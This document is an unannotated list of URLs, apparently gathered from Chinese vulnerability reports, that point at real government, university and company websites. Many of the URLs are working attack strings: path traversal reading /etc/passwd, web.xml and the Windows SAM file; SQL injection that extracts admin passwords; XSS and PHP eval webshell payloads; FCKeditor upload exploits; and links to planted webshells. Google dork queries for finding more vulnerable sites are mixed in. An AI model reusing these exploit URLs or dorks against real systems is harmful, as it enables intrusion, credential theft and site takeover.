https://svn.kuali.org/repos/foundation/tags/kuali-jdbc-2.0.0/src/test/java/org/kuali/common/jdbc/DefaultDatabaseServiceTest.java http://db.12ha.com/Index.aspx?GameCateID=88%7C88%7C88%7C88&type=zhiyejineng&attributeID=254%7C259%7C256%7C257&pclass=%u804c%u4e1a&cclass=%u6218%u58eb&key=%7C-%7C%u6218%u58eb%7C http://learning.citicbank.com/ http://122.226.122.196/reg/username_exists/?username=,其中这个username就是注入点,工具一跑就直接爆出问题了。 http://www.yzu.edu.cn:80/vc/vc/interface/styletop/sitecount_interface.jsp?i_id=7 http://zhfx.guosen.com.cn/jrtz/invest/fund.shtml http://coc.jianshe99.com http://www.hfrc.com/ http://u8dev.yonyou.com/help/index.aspx?key=1 http://www.grny.gov.cn/grny/images/stories/download.php?filename=download.php http://zzz.lgq.gov.cn/admin/infofiles/download.php?filepath=./download.php&filename=download.php http://fwpt.hnjgdj.gov.cn/web/download.action?fileName=../../index.jsp http://bdanews.bda.gov.cn/front/download.action?fileName=index.jsp http://www.yhmohrss.gov.cn/lemis/netweb/detail/download.jsp?url=/netweb/detail/&filename=download.jsp http://www.cqldbz.gov.cn/wssb/download.jsp?filename=../index.jsp http://www.hbcy.gov.cn/application/bgxz/download.jsp?filename=F:/web_changyang/public_html/application/bgxz/index.jsp http://www.eqsc.gov.cn/manage/content/docmanage/download.jsp?filePath=/manage/content/docmanage/download.jsp http://www.hazk.lss.gov.cn/12333/web/secondLevelPage/download.jsp?filename=../../../index.jsp http://jld.cq.gov.cn/bgxz/download.jsp?filename=../index.jsp http://www.cdetdz.gov.cn/edp/edpweb/downLoad.jsp?diskURL=D:/bssoft/edp/WebRoot/edpweb/downLoad.jsp&fileName=index.jsp http://www.symzj.gov.cn/symz/mzxxw/zlxz/download.jsp?filename=../../../index.jsp http://fwzx.bjpg.gov.cn/xzfwzx/system/download.jsp?filename=../download.jsp http://www.szwen.gov.cn/download.jsp?fileName=download.jsp http://www.yhmohrss.gov.cn/lemis/netweb/detail/download.jsp?url=C:\windows\system32\&filename=cmd.exe 
http://www.ahmasepa.gov.cn:8088/masWeb/jsp/include/download.jsp?filename=../index.jsp http://www.js.lss.gov.cn/Auditing/download.jsp?filename=../index.jsp http://www.jiaohe.gov.cn/main/download.jsp?fileName=../index.jsp http://www.ccfwy.gov.cn/wjxz/download.jsp?filename=../index.jsp http://sh.hljagri.gov.cn/download.jsp?filename=../index.jsp http://www.qzlyj.gov.cn/download.jsp?filename=../../index.jsp http://www.ccgp-qinghai.gov.cn/download.jsp?filename=C:\Windows\System32\config\SAM http://www.nbzj.gov.cn/cms/1120/plus/download.php?open=edit&link=download.php http://xxx.kugou.com/news/list?cid=xx http://games.kugou.com http://wap.soufun.com/bbs/verifyphonenum.php?area=sh&version=3g http://www.waipojia.com.cn/crm/Index.aspx?parenttab=Site&module=Notice&action=Index http://www.wandafilm.com/ http://www.wandafilm.com/baseInfo/point/m_init.html http://www.wandafilm.com/baseInfo/point/point_trade.do?m=showGiftDetail&giftId=20130913102134479681 http://ncd.org.cn/Login http://yd.zjjgs.gov.cn/admin/ http://www.mailer.com.cn/Products6.html http://www.mailer.com.cn/New%20Customers/index1.htm http://mail.lyx928.com:8080 http://mail.njzj.gov.cn:8080 http://mail.shszx.gov.cn:8600 http://wooyun.org/bugs/wooyun-2010-049533 http://glxy.mot.gov.cn/BM/index.html http://192.168.90.206:1933/ProductShow.asp?id=7 inurl:/Products.asp?BigClass= http://hljlyzn.com/Products.asp?BigClassID=45 http://sqlmap.org http://wswz.anhuinews.com/search.html http://wswz.anhuinews.com/search.html http://www.gogomusic.cn/ https://wt.westsecu.com/web-console/ http://www.ch.zju.edu.cn/lishi/admin/Index.asp http://www.lxjx.cn/ http://www.bpeg.nc.sgcc.com.cn/ww/contenttest.asp?newsid=&newsformid=XXFBDWB&newssheetno=1309250004&newsisold=0 http://pan.baidu.com/s/1gdDtg8F http://www.bbbao.com/user/fix_user_name http://www.bbbao.com/user/fix_user_name?user_name_new=aaaatt http://nl.yaolan.com/onlineConsultForm!AddonlineConsult.action http://XXXXX/jwweb/JXZY/INFO_Teacher.aspx?id=XXXXXX 
http://220.181.154.150:8080/welcome.do http://220.181.154.150:8080/admin/login.jsp http://www.threeoa.com/case/遍及全国! inurl:action http://jdyz.ijd.cn/findRssPortalRssAction.action?siteId=jdyz&type=0 http://www.jmsyz.net/findRssPortalRssAction.action?siteId=jms&type=1 http://www.mzlyz.cn/findRssPortalRssAction.action?siteId=mzlyz&type=1 http://portal1.dhu.cc/toRecruitRecruitSetAction.action http://zs.xhedu.sh.cn/toRecruitRecruitSetAction.action http://cdpc.dg.gov.cn/dw.jsp?path=E:%5Cwebsite_backup/newbackuup/webapps/ROOT/upload.htm&action=down http://www.eee.cn/yizhi/list_inc/miyu_list_inc.jsp?app=reping&type=4 http://www.eee.cn/manager.do http://www.eee.cn/manager.do http://u.uzai.com/manage/personal-info http://qls.hfut.edu.cn/xwzx_details.php?articles=191存在sql注入; http://www.jumbotcms.net/ajax/content.aspx?cType=soft&id=22&oper=ajaxDownCount&debugkey=5E7D-8A8B-F75C-BFF3 http://slcredit.dg.gov.cn/credit/details.jsp http://slcredit.dg.gov.cn/credit/reDuh.jsp http://220.168.55.61/yhmm.html http://220.168.55.61/system/siteInfo/content_articleManager.do?websiteId=1&channelId=322&pkId=1&handleId=1&formName=/WEB-INF/web.xml http://220.168.55.61//user_base/notification/2014/5/27/silicwebshell.jsp http://www.ly.com/flight/FlightPriceNew.aspx?ajax=GetPageData&OrgPort=CSX&DesPort=&Sort=&CurrPage=2 http://wooyun.org/bugs/wooyun-2010-055900 http://www.gzgrain.com/(广州穂粮集团网址) http://www.gzgrain.com/pic_news/chubei1.asp?xm_table=jieyun(出现问题的地址) http://www6.customs.gov.cn/changchun/tabid/62940/ctl/Admin/mid/173998/Default.aspx http://www.soso.com/q?ie=utf-8&sc=web&pid=-s.idx.se&cid=s.idx.se&query=%27%2Balert%28%2F5up3rc%2F%29+%2B%27&w=&sut=4849&sst0=1401102355181&lkt=9%2C1401102351461%2C1401102355052 http://wxfw.heinfo.gov.cn:8043/admin/System/AMeta.aspx http://wxfw.heinfo.gov.cn:8043/admin/Layout/Category.aspx http://wxfw.heinfo.gov.cn:8043/admin/Statistic/UserStats.aspx http://www.qjnywlw.gov.cn:8887/admin/ExField.aspx http://app.gdgs.gov.cn:8888/aicccps/admin/Support_List.jsp 
http://app.gdgs.gov.cn:8888/aicccps/admin/Xiehui_Edit.jsp?newID=396cf401-0128-1000-e000-0000c0a8647e http://app.gdgs.gov.cn:8888/aicccps/admin/Xiehui_List.jsp http://app.gdgs.gov.cn:8888/aicccps/admin/Xiehui_Edit.jsp?newID=492b4d2b-0128-1000-e000-0024c0a8647e http://www.phpsay.com/ www.phpsay.com http://x213.com/ http://www.wxx.me/ www.17t7.com www.haodar.com http://60.22.23.103:9999 http://60.22.23.103:9999/ChangePassword.aspx http://t.xunkoo.com/home/search?w=%E6%97%85%E6%B8%B8 http://event.youku.com/siemens-home/openthekitchen2013/save.php?action=pclist&foodType=7&page=0 http://spp.hunantv.com/.svn/entries http://spp.hunantv.com/tt.php inurl:extLybWebAction https://www.google.com.hk/webhp?hl=zh-CN&sourceid=cnhp#hl=zh-CN&newwindow=1&q=inurl:extLybWebAction&safe=strict&start=0 http://www.jhzx.gov.cn/zycms/extLybWebAction!queryRed.shtml http://www.zjlxlss.gov.cn/zycms4/extLybWebAction!addWS.shtml?extLybType=3 http://www.lxztb.gov.cn/zycms/extLybWebAction!listjh.shtml http://jhztb.gov.cn/zycms/extLybWebAction!add.shtml http://www.jhjxw.gov.cn/zycms/extLybWebAction!queryWy.shtml http://60.191.198.109:8889/zycms/extLybWebAction!listTsRed.shtml?extLybType.id=2&letter=0 http://old.zjwy.gov.cn/zycms4_info/extLybWebAction!listJh.shtml?currentSite=27&extLybType.id=28&page.pageSize=10&replay=2 http://info.jinhua.gov.cn/zycms4_info/extLybWebAction!listJh.shtml?currentSite=27&extLybType.id=21&page.pageSize=10&replay=2 http://www.jhlsxh.com.cn/zycms4/extLybWebAction!listJh.shtml?currentSite=1&extLybType.id=1&page.pageSize=10&replay=2 http://220.191.229.228/zycms4_info/extLybWebAction!listJh.shtml?currentSite=27&extLybType.id=23&page.pageSize=10&replay=2 http://wygjj.com/zycms4_info/extLybWebAction!search.shtml http://221.192.155.172:7001/showSrvLink.action http://ittools.lhspzx.com/teacher/weboffice/GetExtname.ashx?id=1 http://fzpt.hyxyxx.com/teacher/weboffice/GetExtname.ashx?id=1 http://it.qzgjzx.cn/teacher/weboffice/GetExtname.ashx?id=1 
http://61.175.224.187:888/teacher/weboffice/GetExtname.ashx?id=1 http://wsyj.dg6z.net:81/teacher/weboffice/GetExtname.ashx?id=1 http://jxt.yb10010.com/Public/ShowList.aspx?lm_ID=2 http://jxt.yb10010.com/Public/ShowList.aspx?lm_ID=3 http://jxt.yb10010.com/Public/ShowList.aspx?lm_ID=4 http://jxt.yb10010.com/Public/ShowList.aspx?lm_ID=5 http://jxt.yb10010.com/Public/ShowList.aspx?lm_ID=2 http://u.uzai.com/manage/UserTouristDetail-1-323659.html http://u.uzai.com/manage/UserTouristDetail-0-323665.html http://try.mama.cn/admin/user_info.php?bbirth=1 http://club.xywy.com/yszs/test_expert_online.php?type=data&uid=3129058 http://mail.liby.com.cn/loginAfter.action http://zhidao.auto.sohu.com/browse/home.html https://github.com/momoplan/chlw/blob/068919a6dec7cc6b09de990f4ca68d7a4c658e8c/src/com/ruyicai/util/testEmail.java http://ruyicai.com进行注册,模拟找回密码过程。 ruyicai.com/ruyicai1234登陆 inurl:/riseapprove_web/secondPage/ http://58.221.162.227:9080/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://58.221.206.243:9080/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://zwdt.tz.gov.cn/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://222.184.252.158:9080/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://58.221.232.44:9080/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://58.221.162.227:9080/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://58.221.206.243:9080/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://zwdt.tz.gov.cn/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://222.184.252.158:9080/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 
http://58.221.232.44:9080/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://bsdt.nantong.gov.cn/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://www.changedu.com/ inurl:ShowFiles/BookEquList.aspx http://eq.njfu.edu.cn/ShowFiles/BookEquList.aspx?用户单位:南京林业大学 http://210.29.132.248/ShowFiles/BookEquList.aspx?用户单位:南京师范大学化学与材料科学学院 http://sjjx.njit.edu.cn/sy/share/ShowFiles/BookEquList.aspx?用户单位:南京工程学院 http://web168444.5udns.cn/ShowFiles/BookEquList.aspx?用户单位:也是南京师范的 http://ies.hhit.edu.cn/ShowFiles/BookEquList.aspx http://eq.njfu.edu.cn/ShowFiles/BookEquList.aspx http://www.fsmcms.com.cn/ http://www.fsmcms.com.cn/html/p/p_13/p_13.html site:gov.cninurl:webapp/preview.jsp http://www.fsmcms.com.cn/ http://www.fsmcms.com.cn/html/p/p_18/p_18.html site:gov.cn inurl:cms/sites找政府网站 http://wooyun.org/bugs/wooyun-2014-062496 site:uzai.com http://chat.uzai.com,论坛系统。 http://yjszs.smmu.edu.cn/professor.aspx?pID=161 http://hf.52xinyou.cn/login.html http://bjip.buct.edu.cn/web/article.php?id=1355 http://res.hengqian.com/sort.asp?object_id=1&bb_id=29&s_id=14 http://jy.cwu.edu.cn/jyw/info_details_zhnzxysy.jsp?seq=2279 http://www.cdpx114.com/download.php?id=45 http://www.cdpx114.com/download.php?id=45 http://lswhw.ustc.edu.cn/index.php/admin/index http://www.chysoft.net http://183.61.183.189:81/ http://liuxue.xmu.edu.cn/zhzl.asp?ID=1035存在sql注入点 http://zs.zjut.edu.cn/newsDetail.jsp?id=1270 http://122.11.45.115:8080/ http://www.gaomi.gov.cn/index.asp http://spzx.gaomi.gov.cn:8088/gm/main/zf_View.jsp?type=1 http://www.mcquay.com.cn/controls/admin_index.html http://pbc.zhoushan.gov.cn/bsdt/admin/messagemgr_hf.aspx?fr_id=3693 http://pbc.zhoushan.gov.cn/bsdt/admin/ziliao.aspx http://58.83.233.44/yazuo-weixin/weixin/phonePage/getImage.do?brandId=1119&name=../../../../../../etc/passwd fd:02:b0 www.backup.com http://crm.yazuo.com/ http://58.83.233.61/index.htm http://58.83.233.57/index.html http://58.83.233.56/ 
http://www.yazuo.com/ http://58.83.233.44/yazuo-weixin/weixin/ inurl:common_info.action https://www.google.com.hk/webhp?hl=zh-CN&sourceid=cnhp#hl=zh-CN&newwindow=1&q=inurl:common_info.action&safe=strict http://mgs.homeinns.com/Login.aspx,发现什么也玩不了,然后加了个index.aspx,界面如下 http://mgs.homeinns.com/HLifeCycle/HLCSearch.aspx http://mgs.homeinns.com/HLifeCycle/HLCOldName.aspx?ProCD=P2886 http://mgs.homeinns.com/HLifeCycle/HLCOldName.aspx?ProCD=P2886'--这样就判断出来了,是盲注,所以直接用工具 domain:home http://www.jinher.com/ http://www.*****.com/c6/JHSoft.Web.Login/GetPassWord.aspx?flag=getEmail&UserName=1111 http://invest.china.com.cn/admin/test.aspx?modelName=t_BH_Content_ZiXunXinXi&f_content_ID=3071 http://invest.china.com.cn/admin/test.aspx?modelName=t_BH_Content_ZiXunXinXi&f_content_ID=99999999 http://invest.china.com.cn//admin/test.aspx?modelName=t_BH_Content_ZiXunXinXi&f_content_ID=2196 http://invest.china.com.cn//admin/test.aspx?modelName=t_BH_Content_ZiXunXinXi&f_content_ID=99999999 inurl:spdt_listSp.action https://www.google.com.hk/search?q=inurl:spdt_listSp.action&newwindow=1&safe=strict&hl=zh-CN&noj=1&site=webhp&ei=_KiEU42cIoj68QW63YKgBw&start=10&sa=N&biw=1366&bih=667 http://www.wooyun.org/bugs/wooyun-2014-062573/trace/e36db0b695b609dc4f06687f61f3f8db http://city.vbmcms.com/wap/index.php?mod=store&userid=chunmiao http://city.vbmcms.com/search.php?part=news&keywords=111 http://vanclgroup.googlecode.com/svn/wiki/ http://119.253.53.23/ http://119.253.53.23/Shelf/Clothes?productCode= xxx:Header xx:PHPSESSID http://mach.jlu.edu.cn/hb_images/news/show.php?id=4331 http://www.189.cn/ http://oice.nenu.edu.cn/page/news/liuxue_newsDetail.php?type=101&id=311 http://www.cngy.gov.cn/www.cngy.gov.cn.zip http://jyj.nanyue.gov.cn/jyxx/manage/download.aspx?File=../web.config site:gov.cn inurl:download.aspx inurl:download.aspx site:net inurl:download.aspx site:com inurl:download.aspx http://bbs.eos.changyou.com/uc_server/admin.php 
http://jtj.daqing.gov.cn/uploadfiles/XGXZ/2011/11/VPN%E8%BF%9E%E6%8E%A5%E5%B8%AE%E5%8A%A9%E6%96%87%E4%BB%B6.doc https://www.google.de/#filter=0&newwindow=1&q=inurl:/zlxz/down.aspx&start=0 http://122.226.168.166/webhouse/test.aspx http://www.lhfgc.gov.cn/webhouse/test.aspx http://www.wlfc.gov.cn/webhouse/test.aspx http://www.weitv.com/index.php?s=Admin/Login http://house.focus.cn/ijiayuan/ijy_wq.php?id=181 http://house.focus.cn/ijiayuan/ijy_wq.php?id=181'%20and%201=1%23 http://house.focus.cn/ijiayuan/ijy_wq.php?id=181'%20and%201=2%23 http://www.zoomla.cn/down/Zoomla!CMS2_X1.0.rar http://www.zoomla.cn/down/Zoomla!CMS2_x1.1.rar http://www.szgwbn.net.cn/sgw_best.aspx?parentID=1 http://www.yawsj.gov.cn/install/setup.aspx http://www.pzhcz.gov.cn/cznt/install/install.aspx?step=dbset http://config.baofeng.com http://sro.swjtu.edu.cn/ http://yscb.swjtu.edu.cn/ http://yscb.swjtu.edu.cn/help.asp http://202.115.67.239 http://202.115.75.3/ http://202.115.75.6 http://www.xnlr.gov.cn/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%250 site:www.xnlr.gov.cn http://wap.189kan.net/admin/left.jsp http://www.czslj.gov.cn/WEBSYQ/index.asp?sys=7&local=1 http://www.qinyuancrm.com/login/forgetpswd.php?orgcode=1&loginname=dsdfsfds http://prm.ufida.com.cn/login/forgetpswd.php?orgcode=1&loginname=dsdfsfds http://yindajituan.gicp.net:8888 www.kdlian.com:8001 com:8080 cn:8080 cn:8080 com:8088 http://support.chanjet.com/ http://www.xxxx.com/manage/template.doc查看源码 http://www.xxxx.com/manage/template/findFileList.do?root=WEB-INF/t/cms http://www.xxxx.com/manage/1.jsp http://tuan.pps.tv/index.php?c=test&m=index_test&cat_id=6&city=an_shan&page=15 http://service.chanjet.com/Index.asp http://service.chanjet.com:80/DataBase/DB.mdb http://service.chanjet.com:80/database/db.mdb http://my.tv.sohu.com/us/214995546/69750893.shtml 
http://m.tv.sohu.com/us/214995546/69750893.shtml http://www.soso.com/websnapshot?ie=utf8&url=http%3A%2F%2Fwww.seo6.cn%2FNewsShow.aspx%3Fid%3D7079348f-1b5f-448e-be2e-1a28df7df2bc&did=a0ab67a1fc5e9a0c-a36050172c6735dd-ba7220240d88b7dd6f684e4a346e270f&k=30036050601571da0f37c8a9bb654106&encodedQuery=&query=http%3A%2F%2Fwww.seo6.cn%2FNewsShow.aspx%3Fid%3D7079348f-1b5f-448e-be2e-1a28df7df2bc&&pid=-s.idx.se&duppid=1&w=01020400&m=0&st=0 http://202.206.217.109/404.php/Modules/index/id/1*.html存在注入漏洞 http://202.206.217.109:8080/admin/public/login.html http://sns.web.maxthon.cn/browser/index.php?session_id=%27%22/%3E%3Cimg%20src=1%20onerror=alert%28%29%3Exsssqq:20A34CAFFB6E6C428C8DA3DAC8E06EF8&from=web.my http://extension.maxthon.cn/detail/index.php?view_id=1296 http://help.sundns.com/help/index.php?page=${@print%28eval%28$_POST[c]%29%29 http://zfw.sipac.gov.cn/Data/ModifyWorkInfo.aspx?WorkInfoType_id=5&action=add http://zfw.sipac.gov.cn/AttachedFile/ContentEmbedImg/20140528140125571195.aspx http://forum.wan.com http://jxjy.yangtzeu.edu.cn/ http://jxjy.yangtzeu.edu.cn/onews.asp?id=1434 http://jxjy.yangtzeu.edu.cn/onews.asp?id=1434 http://jxjy.yangtzeu.edu.cn/onews.asp?id=1434 http://210.73.66.91/usercenter/wafplatform/login/welcomelogin.action http://q1.sto.cn/reg/registerform http://q1.sto.cn/shoujireg/sendma?user_name=15000000000 http://hz.hnzj.edu.cn/ http://hz.hnzj.edu.cn/admin/login.aspx http://hz.hnzj.edu.cn/admin/index.aspx http://jw.bhcy.cn/ACTIONSHOWFILES.APPPROCESS?FolderID=201 http://jw.bhcy.cn/ACTIONDOWNLOADFILES.APPPROCESS?FolderID=102&mode=1&page=1&size=15 http://jw.bhcy.cn/ACTIONDOWNLOADFILES.APPPROCESS?FileID=182&FileName=/2012%BC%C6%CB%E3%BB%FA%B3%C9%BC%A8.xls http://jw.bhcy.cn/ http://zs.babybook.91.com/91_assistant_new/Detail.aspx?id=83HAZQJTNH1W2T4X&plat=&action=&platform=&imei=&fw= http://zs.babybook.91.com/91_assistant_new/list.aspx?type=83HELDBAI57O2GK0&plat=&action=&platform=&imei=&fw= ip:210.192.125.141:9200 http://113.142.29.107/weixin 
http://113.142.29.107/weixin/data/ http://113.142.29.107/weixin/data/config.php.wepartner http://113.142.29.107/weixin/data/sqls/ http://113.142.29.107/weixin/data/zhuanpan/9.txt http://calendar.hexun.com/Chart.aspx?ct=2&et=3 http://yytals.yonyou.com/web.rar http://mail.jn05.com/”试一试,结果可以访问,是一个SmarterMail企业版(至今没登陆进去) http://mail.hichina.com/” http://bbs.kuwo.cn/ www.anti-spam.org.cn IP:14.17.43.158 http://119.10.113.102:586/manage/login.asp http://119.10.113.102:8000/download_file.asp?FileName=caozuoshouce_040705.doc http://119.10.113.102:8000/ http://119.10.113.102:8000/admin/login.asp http://119.10.113.102:8000/download_file.asp?FileName=./../admin/login.asp http://61.139.66.70:8080/SignIn.aspx http://61.139.66.70:8080/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=%2F1.asp&NewFolderName=z&uuid=1244789975684 http://61.139.66.70:8080/fckeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=../../connectors/aspx/connector.aspx http://61.139.66.70:8080/Upload/FCKEditor/image/1.asp/112.jpg http://127.0.0.1/upload/?/admin/user_manage/user_save_ajax/ inurl:mafen.asp?shuxing= http://221.181.233.195:10003/index.asp?shuxing=%E9%A6%96%E9%A1%B5 http://221.181.233.195:10003/guanli.asp https://124.***.***.***/ http://edu.gd.chinamobile.com/selfopen.do?action=searchSchool&showradio=1&area_id=1&town_id=3183&school_name= http://www.txrsks.gov.cn/news_view.jsp?Nid=10 http://www.xzjxjy.com/news_view.jsp?Nid=10 http://jxjy.yzrsks.com/news_view.jsp?Nid=59 http://jxjy.harsks.com/news_view.jsp?Nid=10 http://jxjy.harsks.com/news_view.jsp?Nid=10 http://www.sqlmap.org http://124.***.***.***/sni/ http://jx10010.cn/ http://www.tcwmw.gov.cn/news_info.php?id=1000 http://ldap.nftz.gov.cn/~test/lad/client/read.php?id=1000 site:51cto.com site:51cto.com WWW.019029.COM http://auto.vojs.cn/uc_server/admin.php clsid:100C2765-1362-4CCF-AB02-56D916BB8732 http://www.khgj.gov.cn/khxgczxzl/read_1.php?id=568 
http://wooyun.org/bugs/wooyun-2010-02750 http://59.39.88.214/ http://59.39.88.214/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=/asp.asp&NewFolderName=asp.asp http://59.39.88.214//fckeditor/editor/filemanager/browser/default/browser.html?Connector=%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx http://59.39.88.214/FCKEditor/upload/file/asp.asp/201405291852373593.jpg http://jpkt.whu.edu.cn/jpkc2003/ytysbx/DownloadShow.asp?ID=73 http://www.hukou.gov.cn:8088/zxft_read.asp?id=1 http://121.9.238.14:8080/login/ http://121.9.238.14:8080/invite/list http://xlzy.cuit.edu.cn/WebSite/HeartHealth/NewsList.aspx?PNodeNum=008804注入点 http://www.dggwbn.net.cn/msg/ port:9200” http://www.shodanhq.com/search?q=You+Know%2Cfor+search+country%3ACN+port%3A9200 inurl:newsList.jsp?ColumnCode= http://zfgjj.hanzhong.gov.cn/Website/newslist.jsp?ColumnCode=m0202 http://hzsgjj.com/Website/newslist.jsp?ColumnCode=m0101 http://www.lbszfgjj.org/Website/newslist.jsp?ColumnCode=m0201 http://www.jmszfgjj.com/Website/newslist.jsp?ColumnCode=m0202 http://www.rzgjj.com/Website/newslist.jsp?ColumnCode=m1401 http://182.139.134.42/ghzx/ http://wsms.lxdns.com/wsMS/monitorPic/list.do?action=main http://gz.chinasky.net:809 http://gz.chinasky.net:809/login.aspx http://www.lsjjj.gov.cn/info_Print.asp?ArticleID=807 http://philosophy.sysu.edu.cn/jdjsx/info_Print.asp?ArticleID=981 http://www.lsjjj.gov.cn/info_Print.asp?ArticleID=807 http://yjy.sjy.net.cn/Login.action http://www.ctvonline.cn/news.php?act=downloadpdf&mid=2的时候,mid参数存在注入漏洞,可获得管理员信息,后台上传过滤不严格,可以拿到webshell。 http://dlx.njit.edu.cn/index.php/Article/page/id/198.shtml http://dlx.njit.edu.cn:80/index.php/Article/page/id/198 http://ecb.gz.chinanetcenter.com/obs-helper/nav_intro.jsp.bak http://ecb.gz.chinanetcenter.com/obs/www/getDocument.do?doc=WEB-INF/web.xml&locale=zh_CN http://jk.chinamobile.com http://jk.chinamobile.com/cms/ http://it.sto.cn:8080/ cn:8080/lxb/login.php 
http://vi.iflytek.com/web-console/ http://vi.iflytek.com/jmx-console/ http://www.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%20@@version%3E0&keyword=2013 http://demo.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%20@@version%3E0&keyword=2013 http://www.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%02@@version%3E0&keyword=2013 http://demo.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%02@@version%3E0&keyword=2013 http://tuanwei.dlut.edu.cn/show.php?id=16453 http://cadcg.hfut.edu.cn/allurl114.php?id=201104210 http://passport.baidu.com/v2/?ucenterset http://www.baidu.com/p/setting/profile/proxy url:http://www.jackygame.com/news.php?id=19 http://wooyun.org/bugs/wooyun-2014-050715 http://xlzx.psych.ac.cn/newsdetail.php?id=696& http://wooyun.org/bugs/wooyun-2014-050715 http://203.110.164.95/t.php, inurl:/custom/GroupNewsList.aspx https://www.google.com.hk/webhp?hl=zh-CN&sourceid=cnhp#hl=zh-CN&newwindow=1&q=inurl:/custom/GroupNewsList.aspx&safe=strict&start=40 http://baike.baidu.com/view/5293437.htm?fr=aladdin http://bbs.goodbaby.com/_api/api.php?schema=get_m_hots&hours=168&limit=10&jsoncallback= www.wooyun.org/bugs/wooyun-2010-056625 http://caipiao.qingdaonews.com/new_msg.jsp?id=1749 http://116.113.179.98/ http://dir.minigame.qq.com/cgi-bin/dir_fetch_qqhead?imgtype=3&DomainID=207&callback=scn_sendInfo http://u.uzai.com http://www.233.com/search/GetCalendar/tongjilist_zq.asp?Act=zuotilist&num=2 http://www.233.com/search/GetCalendar/tongjilist_zq.asp?Act=zuotilist&num=2&ClassStr=1&jsoncallback= http://www.233.com/search/kaoshibaodian/detail.asp?en=ZC http://payload.moji002.com/skinpay/snsusermobile/isBindedMobile.action?SnsID=151 http://ugc.moji001.com/sns_attention/FansList?&SnsID=151&Start=0&Limit=50 http://manzhouli.gov.cn/zfwz/daj/list.asp?id=156 http://youth.cau.edu.cn/ATTACHMENT/download.php?filepath=./../setting.php http://yxxf.swu.edu.cn/download.php?file=./../includes/config_inc.php http://xwcbsy.ahu.edu.cn/ http://etc.ahu.edu.cn/ http://dqxy.ahu.edu.cn/ 
http://jjxy.ahu.edu.cn/ http://life.ahu.edu.cn/ http://mdsp.ahu.edu.cn/ http://mdsp.ahu.edu.cn/newsdetail.asp?id=34 http://www.cszh.gov.cn/manage/ http://whsz.gxu.edu.cn/index.php/Index/view?id=361 http://course.sdu.edu.cn/ http://course.sdu.edu.cn/Download/edf1ef6e-a9aa-49b7-8364-8b4dd35ea52b.asp http://payload.moji002.com/skinpay/snsuser/modifyPassword.action?SnsID=13260***&NewPassword=301752D1453E772C787DE1550E4712E9 http://ugc.moji001.com/sns_attention/FansList?&SnsID=151&Start=0&Limit=20 http://221.5.251.245/admin/index.jsp www.tsfnzw.gov.cn/site/down/ www.qaxzfw.gov.cn/site/down/downloadfile.jsp?name=web.xml&path=/WEB-INF/ http://www.qaxzfw.gov.cn/site/down/downloadfile.jsp?name=index.jsp&path=/site/down/ site:gov.cn inurl:downloadfile.jsp http://yx.1111.com/ http://www.inspur.com/langchao/search/download.do http://www.bilibili.tv/video/av973850/ http://www.bilibili.tv/m/stow?aid=973850&ajax=1&dopost=save&stow_target=stow&src=1.jpg http://interface.bilibili.cn/feedback/post?msg=By%E9%93%B6%E5%86%A5%E5%B8%81&aid=973850&action=send&src=1.jpg http://interface.bilibili.cn/feedback/agreement?mode=arc&aid=973850&rid=13838573&src=1.jpg http://oa.china-sss.com/defaultroot/public/editor/tpsc.jsp http://oa.china-sss.com/defaultroot/public/editor/js/up_images/2014053116155025567481452.jsp http://manhua.7k7k.com/ http://zheye.cc/reset_password/后面的部分是一个数字加上邮箱号。 inurl:/ycportal http://目标站点/ycportal/js/wbTextBox/showimg.jsp?jumpPage=1&url=/ http://目标站点/ycportal/js/wbTextBox/uploadfile.jsp?blockid=1000 http://www.jztobacco.com.cn/ http://www.rzdonggang.gov.cn/ http://www.jxfdacdc.cn/ http://www.lvlyc.com.cn/ http://ci.cnu.edu.cn/Article.aspx?ID=130004019001805000 http://gl.szairport.com/gjlxs/award.jsp?jplx=1004710 URL:http://www.ggbb.gov.cn/admin/login.php http://ugc.moji001.com/mapi/ResetPasswordBefore?E268443E43D93DAB7EBEF303BBE9642F={{****}}&07CC694B9B3FC636710FA08B6922C42B=[[31343031343334363738363430]]&lan=CH http://ipv6.upc.edu.cn/ 
